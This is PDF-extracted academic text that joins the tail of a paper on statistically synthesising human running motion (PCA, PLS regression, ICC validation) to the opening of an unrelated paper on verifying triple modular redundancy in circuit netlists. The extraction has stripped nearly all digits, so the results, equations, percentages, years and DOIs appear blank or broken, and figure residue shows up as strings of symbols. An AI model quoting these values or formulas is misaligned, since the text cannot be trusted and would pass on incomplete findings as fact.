), resulted in a decomposition of the data matrix w into an average running vector w and , weighed components, arranged in a , × , matrix v : w =w +α·v ( ) where w is a × , matrix with all rows equal to w and α=(αi) with i= ,..., is a × , matrix of pca scores. each observation wi was thus expressed by a linear combination of scores αi and pca components (columns of matrix v ). components represented factors related to gender, anthropometrical traits and running speed. and scores represented individual characteristics of each runner and performance of the running trial related to the previous factors. pca components are arranged in descendent order of explained variance of the original matrix data. thus the first columns in matrix v retained most of the information in the data sample and it was possible to select a reduced number of components c. wic =w +αic ·vc. ( ) above w denoted the average of all the running samples. the matrix vc contained the first components. αic represents the c scores of each observation of the database in the reduced dimension space formed by the selected components. as score values change from negative to positive values, the movement of the runner changes from men to women; high bmi to low bmi; high speed to low speed, etc. the decision of how many components to retain was a critical issue in the exploratory factor analysis. to perform this decision we used the methodology of parallel analysis (pa) (hayton, allen & scarpello, ). pa is a monte-carlo based simulation method that compares the observed eigenvalues (components) with those obtained from randomized normal variables. a component is retained if its explained variance or information is higher than the information provided by the eigenvectors derived from the random data. -regression model: one of the objectives of our work was to generate a statistical model capable of synthetizing new realistic running motion from a set of desired data: age, gender, height, weight and velocity, also called d data. accordingly, to devise the baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bio-motion generator, we needed to establish the correlation between the d data and pca scores, which provide the signature of each motion. the correlation was obtained as a regression model, combining a partial least squares (pls) regression model as a first step and a linear regression model (lrm) as a second step. pls methodology is explained in wold ( ) and geladi & kowalski ( ). this type of regression model is suitable for the kind of data involved in the bio-motion generator since the input data of the model is strongly correlated (anthropometrical information). the pls regression model takes the d data—age, height, weight and velocity—as input information and produces a set of pca scores as output. the lrm model was applied to these output pca scores to reflect the influence of gender in the pca scores. in the first step, we estimated a pls model considering anthropometrical data and velocity of the movement as independent variables and the pca scores as dependent variables. the general formula of a pls model is: y −y =b·(x−x )+e ( ) where y is the matrix of dependent variables, x is the matrix of independent variables, x and y are the matrices of mean data, b is the coefficient matrix of the pls model and e is the prediction error matrix. havingfourdifferent dmeasurementsforeachsubjectxi=[age,height,weight,velocity], we built a × matrix x formed by the concatenation of the vectors xi. notice that since matrix =α , it is constituted by pca scores and the mean matrix y is the zero matrix. finally, we estimated the coefficient matrix b from sample data x and α with the pls algorithm and substituted in the equation above, obtaining the following model: α=b·(x−x )+e. ( ) where x is the matrix of mean anthropometrical data and velocity, and e is the prediction error matrix. pls decomposes the independent and dependent variables in component spaces in order to obtain their correlation. the number of significant pls components in the model was selected in a leave-one-out procedure and according to the explained variance (r ) criteria. secondly, the influence of gender was modelled with a lrm of the prediction error matrix e with coefficients a = (a ,...,ac) and b = (b ,...,bc), where c is the number of retained pca components: ê =a+b·gender ( ) where gender = for men and gender = for women. this way, the motion information related to gender which is part of the pls error matrix e, and uncorrelated with the prediction derived from the pls regression, was modelled. notice that aj and bj were considered zero whenever their f-value was below a desired level of statistical significance of %. once we have obtained b, a and b, whenever we want to synthesize a running motion from new anthropometrical data and velocity, we obtain the corresponding scores α̂ of the baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new realistic running motion by the following formula: α̂=[a−b·x ]+ [ b b ] · [ x gender ] ( ) where x is the matrix of mean anthropometrical data and velocity. validation methodology of the bio-motion generator to validate the five-step methodology described to develop the bio-motion generator we propose a comparison between each recorded observation and the prediction of running motion generated by the model by means of the ‘leave-one-out’ procedure. the recorded observation is considered the true angle curve of the running motion. the predicted motion is estimated using the ‘leave-one-out’ validation technique; that is, not including that observation in the bio-motion generator. we wish to determine if both curves are reproducible and sufficiently similar to consider that they represent the same motion. for this purpose, we use the intraclass correlation coefficient (icc) as a measurement of the reliability, and the standard error of measurement (sem) as a direct measurement of the global error between true and predicted angles. theoretically, the icc is defined as the ratio between the true variance and the predicted variance. the icc varies between and and can be interpreted as the proportion of variance due to the methodology (true versus predicted data) in the total variance. an icc greater than . is generally considered to be good (fleiss, ). the icc is determined between the measured or true curve (tc) and the estimated curve (ec) provided by the bio-motion generator. the icc is determined from the variance of both curves (tc) and (ec) following the next equation: icc= σ ec (σ tc +σ ec ) ; ( ) on the other hand, sem represents the existent difference between observed (tc) and estimated curves (ec) determined with the bio-motion generator, and provide an indication of the real magnitude of the error. sem=σc · √ ( −icc); ( ) where σc is the combined standard deviation of the true scores (tc) and observed scores (ec). and se is the combined standard deviation of the true scores and observed scores. we have obtained the sem for each pair of true and predicted angles for the three spatial directions in all the joints that form the human model. for that reason, we have represented the sem by its descriptive statistics (mean, std., -percentile and -percentile). results parallel analysis the results of the pa (fig. ) have been obtained with the explained variance of the main components extracted from the original data and the same obtained from randomized baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. number of principal components e xp la in e d v a ri a n ce ( % ) original data random data figure relation between the explained variance and the number of principal components extracted from the database and from randomized data. data. the intersection point of both curves indicates the optimal number of components to extract from the pca. the original number of dimensions was ( related to the pelvis translation + related to the body segments orientation). the results of the pa recommend retaining the first eigenvalues, which explain the . % of the total variance. thus, the pca allowed a percentage of data reduction of %, from variables to weighed components. regression model as it has been explained in the methodology, the regression model consists of two parts, the first including the anthropometrical data (pls) and the second the gender (lrm). the dependent variables of the pls are the scores of the first principal components (pc) of the kinematical running motion. therefore, they are uncorrelated and the optimal number of pls components are separately determined for each pc score (pc ... pc ) according to its adjusted r plot (fig. ). pls components are retained until their r curve exhibits a decrease or a non-significant increase. thus, for instance, two pls components are retained for pc , whereas no components are considered for pc and pc . notice that for those pc with retained components, the pls model provides their mean value as output. this way, the motion information associated to those pc which is provided by the pls model is the average motion. with regard to the lrm, which analyses the influence of gender in the kinematics of running, the pca scores which are significantly affected by gender are pc , pc , pc , pc and pc (table ). the prediction obtained in the first step of the model is improved by the influence of gender on these pc. pc and pc are only affected by gender, since their number of retained pls components was . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed figure leave-one-out r estimation plots for the pls model. validation of the bio-motion generator the results of the reliability study, computed from the observations and the same calculated by means of the leave-one-out technique, showed that the mean and standard deviation of icc, was . ( . ) with a percentile of . and percentile of . . only one subject exhibit an icc lower than . in two observations (fig. ). the sem between the real and the predicted angles determined with the leave-one-out model showed a mean (std.) of . ◦ ( . ◦), with a percentile of . ◦ and percentile of . ◦ (fig. ). discussion in this paper we have demonstrated that the five-step methodology on which the bio-motion generator is based provides running motion models closely resembling the measurements obtained with real subjects. however, while the sem study shows that the vast majority of errors detected between actual and predicted data of the bio-motion generator are less than ◦, there are a percentage of observations ( %) in which greater errors are observed. this can be explained because the model has been obtained from a small number of subjects—only —and therefore the bio-motion generator is not able to adjust the running specific characteristics of each corridor. future work in this line of research baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table anova table for the linear models. df sum sq mean sq f-value pr (>f) gender . . pc residuals gender . . pc residuals gender . . * pc residuals gender . . pc residuals gender . . pc residuals gender . . pc residuals gender . . * pc residuals gender . . ** pc residuals gender . . * pc residuals gender . . pc residuals gender . . *** pc residuals gender . . pc residuals notes. signification codes . ‘***’; . ‘**’; . ‘*’. must be done to increase the database of real subjects measured and incorporate greater variability in anthropometric and performance characteristics. the bio-motion generator is based on a methodology which comprises five steps. in the fourth step we tackle a dimensionality reduction based on pca. this step is similar to that performed by troje ( ). however, there are some differences, as he obtained four main components that explain more than % of the variance and we have obtained components explaining . % of variance. the greater variability of our study is explained partly by the greater variability of the running against walking and on the other hand by the greater speed range in our study in relation to troje, in which each subject could select a single comfortable walking speed. on the other hand, troje made a second reduction of the dimensionality based on the simplicity of temporal behaviour of the walking components which could be modelled with pure sine functions with a scaled fundamental frequency. this approach was not valid for the motion of running, due to the fact that the pcs of running cannot be modelled with a proportional frequency. this suggests that running is a more complex motion than walking in the sense that there does not exist a proportion between the frequency of oscillation of the different body segments. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure frequency histogram of the icc. sem f re q u e n cy figure frequency histogram of the sem. the fifth step of the methodology consists of a two-step linear regression which correlates a given list of d measurements with the pca scores of movement. a linear regression technique has been used before to approximate motion models from a reduced marker set and estimate the remaining markers (liu et al., ) or to model the motion-style and the spatio-temporal movement (torresani, hackney & bregler, ). however, it has not been used before to synthesize new human motion directly from a set of anthropometrical and performance data. in this sense, it can be considered a real breakthrough in the field of synthesis of human motion. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure reconstructed virtual biomechanical model (skeleton+motion). conclusions the major contribution of this paper is a novel statiscal methodology for modelling human movements. the method described in this article has been developed and validated for running motion, but this same methodology could be used to synthesize other types of motion: walking, going up and down stairs, or even for sport movements such as: jumping, pedalling, golf swing and putting, etc. our work aims to provide a realistic motion to body shapes that can be developed with the methodology described in the work of ballester et al. ( ). those body shapes could include an adjusted skeleton formed by a hierarchical set of interconnected joints and can be used to move the body shape with the required or desired motion provided by our methodology (fig. ). the integration of both methods will allow generating realistic avatars supplied with realistic motion from a set of adjustable and simple anthropometrical and performance data and without the need of the realization of new measurements. a limitation of this study is the sample size. further work needs to be done in order to validate with a broader sample of people. notwithstanding this limitations, the findings suggest that the model is valid. additional information and declarations funding the research for this paper was done within the easy-imp project (http://www.easy- imp.eu/) funded by the european commission fp .fof.nmp. - project . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.easy-imp.eu/ http://www.easy-imp.eu/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: european commission: fp .fof.nmp. - project . competing interests the authors declare there are no competing interests. author contributions • josé maría baydal-bertomeu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • juan vicente juan v. durá-gil conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • ana piérola-orcero analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • eduardo parrilla bernabé prepared figures and/or tables, performed the computation work. • alfredo ballester and sandra alemany-mut reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ethics committee. universitat politècnica of valencia. data availability the following information was supplied regarding data availability: the raw data has been supplied as supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ballester a, parrilla e, uriel j, pierola a, alemany s, nacher b, gonzalez j, gonzalez jc. . d-based resources fostering the analysis, use, and exploitation of available body anthropometric data. in: th international conference on d body scanning technologies. biewener aa, farley ct, roberts tj, temaner m. . muscle mechanical advantage of human walking and running: implications for energy cost. journal of applied physiology ( ): – doi . /japplphysiol. . . bruderlin a, williams l. . motion signal processing. in: proceedings of the nd annual conference on computer graphics and interactive techniques. acm, – . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /japplphysiol. . http://dx.doi.org/ . /peerj-cs. davis j, bobick a, richards w. . categorical representation and recognition of oscillatory motion patterns. in: proceedings of the ieee conference on com- puter vision and pattern recognition, , vol. . piscataway: ieee, – doi . /cvpr. . . dvorak j, antinnes ja, panjabi m, loustalot d, bonomo m. . age and gender related normal motion of the cervical spine. spine ( suppl):s –s doi . / - - . feipel v, rondelet b, lepallec jp, dewitte o, rooze m. . the use of dishar- monic motion curves in problems of the cervical spine. international orthopaedics ( ): – doi . /s . fleiss jl. . the design and analysis of clinical experiments. new york: wiley. geladi p, kowalski br. . partial least-squares regression: a tutorial. analytica chimica acta (january): – doi . / - ( ) - . hayton jc, allen dg, scarpello v. . factor retention decisions in exploratory factor analysis: a tutorial on parallel analysis. organizational research methods ( ): – doi . / . johansson g. . visual perception of biological motion and a model for its analysis. perception & psychophysics ( ): – doi . /bf . kajita s, kanehiro f, kaneko k, fujiwara k, yokoi k, hirukawa h. . a realtime pattern generator for biped walking. in: proceedings of the ieee international conference on robotics and automation, , vol. . piscataway: ieee, – doi . /robot. . . li y, wang t, shum h-y. . motion texture: a two-level statistical model for character motion synthesis. in: acm transactions on graphics (tog), vol. . new york: acm, – . liu g, zhang j, wang w, mcmillan l. . a system for analyzing and indexing human-motion databases. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . meredith m, maddock s. . motion capture file formats explained. department of computer science, university of sheffield, sheffield. available at http://www.dcs. shef.ac.uk/intranet/research/public/resmes/cs .pdf . mills pm, morrison s, lloyd dg, barrett rs. . repeatability of d gait kinematics obtained from an electromagnetic tracking system during treadmill locomotion. journal of biomechanics ( ): – doi . /j.jbiomech. . . . novacheck tf. . the biomechanics of running. gait & posture ( ): – doi . /s - ( ) - . pandy mg. . computer modeling and simulation of human movement. annual re- view of biomedical engineering ( ): – doi . /annurev.bioeng. . . . thies sb, tresadern p, kenney l, howard d, goulermas jy, smith c, rigby j. . comparison of linear accelerations from three measurement systems during ‘‘reach & grasp". medical engineering and physics ( ): – doi . /j.medengphy. . . . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / - - http://dx.doi.org/ . /s http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . /robot. . http://www.dcs.shef.ac.uk/intranet/research/public/resmes/cs .pdf http://www.dcs.shef.ac.uk/intranet/research/public/resmes/cs .pdf http://dx.doi.org/ . /j.jbiomech. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /annurev.bioeng. . . http://dx.doi.org/ . /j.medengphy. . . http://dx.doi.org/ . /peerj-cs. torresani l, hackney p, bregler c. . learning motion style synthesis from percep- tual observations. in: advances in neural information processing systems. cambridge: mit press, – . troje nf. . decomposing biological motion: a framework for analysis and synthesis of human gait patterns. journal of vision ( ): – doi . / . . . troje n. . retrieving information from human movement patterns. in: thomas fs, zacks jm, eds. understanding events: from perception to action. oxford: oxford university press, – . ullah s, finch cf. . applications of functional data analysis: a systematic review. bmc medical research methodology : doi . / - - - . vasilescu mao. . human motion signatures: analysis, synthesis, recognition. in: proceedings of the th international conference on pattern recognition, vol. . piscataway: ieee, – . vinué g, león t, alemany s, ayala g. . looking for representative fit models for apparel sizing. decision support systems (january): – doi . /j.dss. . . . wold h. . partial least squares. in: samuel k, read cb, balakrishnan n, vidakovic b, johnson nl, eds. encyclopedia of statistical sciences. hoboken: john wiley & sons, inc. zhang j-t, novak ac, brouwer b, li q. . concurrent validation of xsens mvn measurement of lower limb joint angular kinematics. physiological measurement ( ): – doi . / - / / /n . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . / - / / /n http://dx.doi.org/ . /peerj-cs. triple modular redundancy verification via heuristic netlist analysis submitted may accepted august published august corresponding author giovanni beltrame, giovanni.beltrame@polymtl.ca academic editor mary sheeran additional information and declarations can be found on page doi . /peerj-cs. copyright beltrame distributed under creative commons cc-by . open access triple modular redundancy verification via heuristic netlist analysis giovanni beltrame polytechnique montréal, montréal, québec, canada abstract triple modular redundancy (tmr) is a common technique to protect memory elements for digital processing systems subject to radiation effects (such as in space, high-altitude, or near nuclear sources). this paper presents an approach to verify the correct implementation of tmr for the memory elements of a given netlist (i.e., a digital circuit specification) using heuristic analysis. the purpose is detecting any issues that might incur during the use of automatic tools for tmr insertion, optimization, place and route, etc. our analysis does not require a testbench and can perform full, exhaustive coverage within less than an hour even for large designs. this is achieved by applying a divide et impera approach, splitting the circuit into smaller submodules without loss of generality, instead of applying formal verification to the whole netlist at once. the methodology has been applied to a production netlist of the leon -ft processor that had reported errors during radiation testing, successfully showing a number of unprotected memory elements, namely flip-flops. subjects computer aided design, computer architecture, embedded computing keywords single event effects, triple modular redundancy, verification introduction at high altitude or in space, without the protection of the earth’s magnetic field and atmosphere, integrated circuits are exposed to radiation and heavy ion impacts that can disrupt the circuits’ behavior. this paper focuses on single-event-upsets (seus), or soft errors, usually caused by the transit of a single high-energy particle through the circuit. in particular, we consider single bit flips in memory elements embedded in logic, implemented as flip-flops. protection against seus can be obtained in several ways, and in particular this work considers the protection strategy based on the triplication of the storage elements of a circuit, combined with majority voting (carmichael, ), usually referred to as triple modular redundancy (tmr). tmr can be either implemented during high level design (habinc, ) or at a later stage by automatic netlist modification. typically, after a new radiation-tolerant asic is produced, it undergoes a strict test campaign, including costly and time consuming radiation tests using particle accelerators. when a problem linked to the radiation effects protection logic arises during a radiation test campaign, it is already too late; the first prototype asics have been manufactured and the whole fabrication process needs to be rerun. detecting this kind of problems before fabrication is key, therefore several how to cite this article beltrame ( ), triple modular redundancy verification via heuristic netlist analysis. peerj comput. sci. :e ; doi . /peerj-cs. mailto:giovanni.beltrame@polymtl.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. software (kanawati & abraham, ; boué, pétillon & crouzet, ; maestro, ; goswami, iyer & young, ) and hardware-based (aguirre et al., ) tools for fault injection and protection verification have been proposed in the recent past. however, such tools usually are not designed to provide full seu protection verification, and require extremely long simulation and/or execution times when attempting comprehensive fault injection and analysis campaigns. to the best of the author’s knowledge, no commercial or academic tool providing tmr implementation verification is currently available. this paper presents a novel way to verify the tmr implementation of a given circuit by executing a heuristic netlist analysis. our goal is to verify that tmr constructs are insensitive to single bit flips (i.e., the logic is triplicated), and transients on clock or reset (i.e., there are no common reset/clock lines between redundant memory elements). to reduce execution time, we use a divide et impera approach, splitting the netlist in smaller submodules, without loss of generality. results show that verifying tmr on a k gates netlist is possible within around half an hour on a standard pc. as this work is based on formal analysis, our approach does not rely on a testbench, allowing a full coverage test based solely on the device netlist. this paper is organized as follows: previous works on the subject are introduced in ‘previous work’; ‘proposed approach’ details the algorithm together with necessary definitions, its implementation and its complexity; experimental results are shown in ‘ex- perimental results’, and ‘conclusions and future work’ draws some concluding remarks. previous work in the past, different approaches have been proposed for design verification against soft errors. these approaches can be divided in two kinds: fault injection simulation and formal verification. fault injection simulators run a given testbench on the design under test (dut), flipping either randomly or specifically targeted bits. the outputs of the dut are then compared with a golden model running the same testbench, and discrepancies are reported. fault injection simulators come in two different flavors: on the one side there are software-based simulators like mefisto-l (boué, pétillon & crouzet, ) or sst (maestro, ) (which is based on modelsim), that allow full observability and control of the simulated netlist. these tools are marred by extremely slow low-level simulation, requiring hours or days of simulation, making them unsuitable for full coverage tests. on the other hand, some tools use special hardware to speed up the simulation cycle, such as ft-unshades (aguirre et al., ), which uses partial reconfiguration of an fpga to quickly introduce bit-flips (simulating seus) without requiring modifications of the dut. although this provides a consistent speedup compared to the software based approach, it is still unfeasible to run exhaustive verification of a typical asic design in full, which would require the injection of bit flips in all possible flip-flops (ffs) at any possible time during the simulation. it is also worth noting that the results of these approaches and how they can be interpreted strongly depend on the testbench used. beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. formal verification against soft-errors was introduced by (seshia, li & mitra, ): the idea is to merge a formal model of the dut with a soft error model, proving a given set of properties on the merged model. this requires a formal model of the dut and a complete and exhaustive set of formally defined properties to be proven. in other words, the main issue of this formal approach is that the coverage is as good as the definition of such properties. this work tries to overcome these limitations and provide full verification of a tmr-based dut with reasonable analysis time. the idea presented in this paper can be classified as a fault-injection simulation, but follows a different approach as compared to previous work: instead of trying to simulate the whole circuit at once and doing a timing accurate simulation, we focus on a behavioral, timeless, simulation of small submodules, extracted by automatic analysis of the dut internal structure, with the specific goal of detecting any triplicated ff that is susceptible to the propagation of seus in the dut. proposed approach the starting point of our analysis is a radiation hardened circuit, protected by triplication of storage elements and voting (tmr in carmichael ( )). our objective is to verify that indeed all ffs are adequately protected, and no issues were introduced, for example, by synthesis or routing tools. starting from a given design with n ffs, a naive testing approach for seu-sensitive ffs would require injecting faults in all n possible ff configurations, for all of the m time instants of a given testbench. this would lead to an impractically long simulation time, as typical systems consist of several thousand ffs. our approach performs a behavioral fault injection, splitting the whole system into smaller submodules, that can be analyzed independently, allowing full verification to be carried out in a reasonable timeframe. these submodules are the logic cones driving each ff. a logic cone is a set of com- binational logic bounded by ffs and i/o (see fig. ). to verify that no ff are sensitive to seus (therefore assuring the correct tmr implementation), it is possible to extract its driving logic cone, and perform an exhaustive fault injection campaign. this means that the ffs bounding the logic cone are injected single bit flips in all possible input configurations, comparing the output of the logic cone with its expected (i.e., fault-free) one. it is also necessary to verify that all the triplicated ffs have separate asynchronous reset and set lines, otherwise a transient on one of these lines might still cause a failure in the circuit. testing all possible configurations for a logic cone means nf injections, with nf the number of driving flip-flops making the analysis difficult or impossible for high nf . when tmr is applied to each memory element, nf increases by a factor in each logic cone, and the cone itself is modified to account for the voting logic, as shown in fig. . however, when a tmr implementation is present, each logic cone is driven by triplets of flip-flops and fig. shows how his restricts the number of input configurations that are actually valid for the cone, as all ff belonging to the same triplet share have the same value during normal operation of the circuit. the proposed algorithm, considering only valid configurations when performing fault injection, reduces the number of injections beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. !"#$% &"'( !"#$% &"'( !"#$% &"'( !"#$% &"'( !"#$% !"#$% !"#$% !"#$% !"#$% !"#$% ) * & ) + ) , ) - * + * , * - & , & - & . figure a logic cone is a set of logic bounded by ffs and i/o. when tmr is applied, each logic cone contains part of the voting logic. !"#$% &"'( !"#$% !"#$% ) * ) + ) , - * - + - , & . ) * ) + ) , - * - + - , & . *///*///* *///*///* & ** *///*///* +///+///+ & *+ +///+///+ *///*///* & +* +///+///+ +///+///+ &++ figure a logic cone where ff triplets have been identified: the valid configurations are shown. to nf ( + nf ), with nf the number of driving ffs for each logic cone. this results in a considerable analysis speed-up: fig. shows the trend for the number of injections needed as nf increases. the methodology here presented relies on some assumptions: the whole circuit is driven by only one clock and there are no combinatorial loops. furthermore, it is assumed that there are no signal conflicts inside the netlist (i.e., two-valued logic) and that there are no timing violations. finally, we assume that all ffs have one data input and one clock source. mathematical model to describe the algorithm, we need to introduce a special directed graph structure. the nodes of this graph have indexed inputs and are associated to a logic function and a value, beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. number of ffs n u m b e r o f in je c ti o n s [ lo g ] tmr not identified tmr identified figure trend for the number of checks needed per for a logic cone with as the number of driving ffs increases. as outlined in the following. we assume without loss of generality that every gate has just one output. gates that have n ≠ outputs are converted into n nodes having the same inputs, each representing one output. taking this into account the netlist can be easily converted into a directed graph structure definition a circuit graph g is defined as a tuple{v ,e,s,f}, where: • v is a set of nodes (representing logic gates) • e ⊆ v ×v ×n is a set of edges (representing interconnection wires) • s ⊆ v ×{ , } is a set of values (representing the node values) • f ⊆ v × t is the set of logic functions associated to each node, where t is the set of computable boolean functions every node v ∈ v has outgoing edge and num inputs(v) ⊆ n inputs. the set of valid input indices for a node v ∈ v is given by nv ={ ,...,num inputs(v)}. an edge e = (x,y,i)∈ e with x,y ∈ v and i ∈ ny represents a connection from node x to the input i of node y. assuming that the input circuit is free of driving conflicts, the circuit graph fullfills the property: ∀v,w,x ∈ v ,∀i ∈ nv : v ≠ w∧(w,x,i) ∈ e h⇒ (v,x,i) ∉ e which means that any given input of a node is connected to a single node output. we also assume that there are no unconnected inputs in the circuit, which translates to the beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. property: ∀x ∈ v ,∀i ∈ nx,∃w ∈ v : (w,x,i) ∈ e. ( ) to describe the algorithm, we need to define predicates that represent node properties. definition the set of direct predecessors of node x, i.e., the set of nodes with a direct connection from their output to one of x inputs is defined as: pre(x) ={w | ∃i ∈ nx : (w,x,i) ∈ e}. definition let us define the predicate is f f for a given node x ∈ v , which determines if x represents a ff: is f f (x) =  true if x ∈ v is a ff or in-/output node false else for the sake of simplicity, top-level in-/outputs are considered as ffs with no inputs. the set of nodes that represent ffs is: vff ={x | ∀x ∈ v ,is f f (x)}. definition we define the set of nodes which are directly and indirectly connected to the inputs of a given node x ∈ v as the smallest set pre f fs(x) for which the following properties hold∀w ∈ pre(x): is f f (w) h⇒ w ∈ pre f fs(x) ¬is f f (w)∧v ∈ pre f fs(w) h⇒ v ∈ pre f fs(x). having assumed that each ffs has one input, we can define the driving node for a given ff as definition a driver for ff x ∈ vff is defined as: driver(x) ={y | (y,x, ) ∈ e}. finally, we need the operators to compute the values associated to each node: definition the value of a node x ∈ v is given by the eval operator, defined as: eval(x) =  evalff(x) if x ∈ vff evall(x) else where evalff returns the value stored in ff x: evalff(x) ={a | (x,a) ∈ s} beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and evall computes the value of logic (i.e., non ff) nodes, which depends on the node input values: evall(x) ={f (eval(y ),...,eval(yn)) | (x,f ) ∈ f,yi ∈ pre(x)} we also define the configuration of a set of ffs{x ,x ,..xn}∈ vff as config(x ,...,xn) = (eval(x ),...,eval(xn)). a configuration config(x ,...,xn) is defined as valid when two ffs driven by the same logic value share the same value for all configurations: ∀x ,...,xn ∈ vff,∀i ∈ nxi ,∀j ∈ nxj : driver(xi) ≡ driver(xj) h⇒ eval(xi) = eval(xj) with≡being defined as functionally identical (see definition ). the proposed methodology is composed of steps: . triplet identification: determine all the ff triplets present in each logic cone . tmr structure analysis: perform an exhaustive fault injection campaign on all valid configurations . clock and reset tree verification: assure that no ff triplet has common clock or set/reset lines these steps are detailed in the following. triplet identification to determine a useful set of valid configurations for a logic cone (here represented by a subgraph), it is necessary to identify which ffs are triplicated, as all the ffs belonging to a triplet have to share the same value. however, the gate naming scheme is usually insufficient. a base assumption for triplet identification is that all triplicated ffs are driven by the same source. an algorithm based on this fact is able to find most triplets, but this simple mechanism is not always sufficient for more complex netlists. during synthesis, netlists are often optimized in a way that voids this property. figure shows an example: voter was partially duplicated using other logic elements, with t or and t not delivering the same values for all configurations of t ff *, thus leaving t ff with a different set of inputs with respect to the other members of the triplet. the synthesizer introduces this redundancy for delay optimization, place and route constraints, etc. therefore, we assume that two ffs belong to one triplet if they are both driven by functionally identical nodes. definition two nodes x and x are functionally identical (x ≡ x ) if pre f fs(x ) = pre f fs(x ) and eval(x ) = eval(x ) for all possible configurations of pre f fs(·). testing for functionally identical inputs requires equivalence checking (thornton, drechsler & gunther, ) of the logic functions expressed by the nodes. for the sake of beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. voter voter t _or t _and_ t _and_ t _and_ t _ff_ t _ff_ t _ff_ t _not t _ff_ t _and_ t _and_ t _and_ t _ff_ t _and_ t _ff_ t _or t _nor figure a sample graph with ff triplets and voters after optimization. simplicity we implemented a simple checker that exhaustively compares all possible input configurations for the two nodes. checking the equivalence between two nodes might be impractical, as the problem grows exponentially (roughly pre f fs(x)). however, wrong triplet identification affects the verification of tmr protection only with the reporting of false positives, i.e., reporting a faulty triplicated structure when none exists. therefore, we propose a heuristic algorithm in three steps. let us consider the example of fig. , where it is worth noting that other algorithms for functional equivalence checking can be used here. algorithm is applied to t ff and t ff (x and y in the algorithm, respectively). two sub-algorithms are needed: definition mark graph(x) traverses the graph starting at node x and marks all visited nodes, stopping at ffs. its behavior is formalized in algorithm . definition find marked(y,x) traverses the graph depth-first starting from y until a ff is encountered and returns all the nodes that were found as marked by x. its behaviour is formalized by algorithm . the first step checks the sets of driving ffs for equality (lines – ) before starting from x (fig. , t ff ) and traversing the graph depth first, marking all visited nodes (shown as a second circle in fig. ), until a ff is visited and marked (line ). in a second step the algorithm starts again from y (fig. , t ff ) and traverses the graph until reaching a marked node. if an unmarked ff is traversed, this shows that x and y are not functionally identical in the same clock cycle, and the algorithm aborts. after assuming no ffs were duplicated during optimization. terminating successfully, the algorithm returns the set of marked nodes (alg. , line ). for the example in fig. this would be t and , t and , t ff . the third step verifies that all configurations for this set have the same values for x and y. this is done by assigning all possible configurations to this set (alg. , lines – ) and evaluating the subgraph for x, y to compare the results (line ). checking all possible configurations, as opposed to only valid ones, might result in functionally identical nodes not being recognized. instead of drawing a sharp yes/no conclusion, the number of matching configurations is compared for all possible triplet allocations, and the best one is used to assign the ffs. in other words, the nodes xi and xj belong to the same triplet for which i and j (i ≠ j) result in the largest number of matching configurations. beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. function : functionally identical(x,y) input : 